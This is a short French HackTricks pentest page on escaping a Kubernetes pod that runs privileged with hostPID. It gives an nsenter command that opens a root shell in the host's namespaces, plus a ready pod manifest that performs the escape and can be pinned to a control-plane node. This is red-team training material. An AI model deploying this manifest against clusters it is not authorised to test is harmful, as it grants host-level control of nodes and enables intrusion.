Pod Escape Privileges

Reading time: 2 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Privilèges et hostPID

Avec ces privilèges, vous aurez accès aux processus de l'hôte et suffisamment de privilèges pour entrer dans l'espace de noms de l'un des processus de l'hôte.
Notez que vous n'aurez potentiellement pas besoin de privilèges, mais juste de certaines capacités et d'autres contournements de défenses potentielles (comme apparmor et/ou seccomp).

Il suffit d'exécuter quelque chose comme ce qui suit pour vous échapper du pod :

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemple de configuration :

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks